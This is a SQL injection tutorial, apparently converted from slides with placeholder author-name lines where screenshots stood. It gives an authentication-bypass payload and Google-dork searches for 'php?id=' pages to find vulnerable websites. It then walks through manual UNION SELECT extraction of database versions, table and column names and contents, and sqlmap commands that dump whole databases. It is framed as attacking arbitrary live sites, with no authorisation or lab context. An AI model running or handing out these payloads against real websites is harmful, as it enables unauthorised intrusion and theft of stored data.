Sql Injection Authentication Bypass Method:

Execute 1’ or ‘1’ = ‘1 in the both username and password fields. If the target web application is
vulnerable to the sql injection it will give access to you even with the mentioned malformed queries.

You will get access to the remote website like this

Chinni Diwakar 1
Chinni Diwakar 2
Chinni Diwakar 3
Sql Injection Manual Steps:

Finding out the Vulnerable Page in google with google dorks

Just search for php?id= along with your favorite keywords in internet to find out vulnerable websites

' enter single quote to test sql injection vulnerability

if you get sql error or content miss in the webpage that website is vulnerable

Chinni Diwakar 4
Append order by 1--

order by 2--

and so on till you get error

Chinni Diwakar 5
if you get error at 11 means you have 10 columns

if you get error at 8 means you have 7 columns

then replace order by with

union select (list of columns)--

union select 1,2,3,4,5,6,7--

Chinni Diwakar 6
sometimes give negative php id also like

php?id=1 union select 1,2,3,4,5,6,7--

or

php?id=-1 union select 1,2,3,4,5,6,7--

the above command will show you the vulnerable column numbers in web page.

you can simply replace with sql commands to get the sql query output.

Example

To know the version of database server execute command like below image

The database server will give information like this

Chinni Diwakar 7
To know the host and username execute command like below image.

You will get reply as follows

Chinni Diwakar 8
Now if you want you can execute some commands to retrieve database information also like tables

php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where

table_schema=database()--

Chinni Diwakar 9
Then you can extract column names from a table like this

php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns

where table_name=<table name text or ascii values>--

Chinni Diwakar 10
Chinni Diwakar 11
php?id=-1 union select 1,2,group_concat(column name your want to get),4,5,6,7 from <table_name>--

You will get output like this

Chinni Diwakar 12
Chinni Diwakar 13
Performing Sql Injection with SQL map tool.
Finding out vulnerable website from google

Search for php?id= along with the combination of other google dorks to find out vulnerable pages.

The take any page which includes php?id=<some number>

Open a blank terminal and execute the following command.

sqlmap –u <URL of the vulnerable website> --dbs

Chinni Diwakar 14
This will leakout the target sql server database names. Then we have to retrieve the table names from
the database with the below given command.

sqlmap –u <URL of the vulnerable website> -D <database> --tables

Chinni Diwakar 15
After some processing like the above picture you will get table names like the below picture

Chinni Diwakar 16
Next we need to extract columns information from the above shown tables for that follow the given
command.

sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> --columns

Chinni Diwakar 17
You will get column names like this

Chinni Diwakar 18
Finally we need to grab the contents in the database columns with the below command.

sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> -C <columnnames> --dump

Chinni Diwakar 19
You will be asked few questions in order to get the contents act according to the questions, you can see
few in the above image. Finally you will get data like shown in the below image.

Chinni Diwakar 20
Chinni Diwakar 21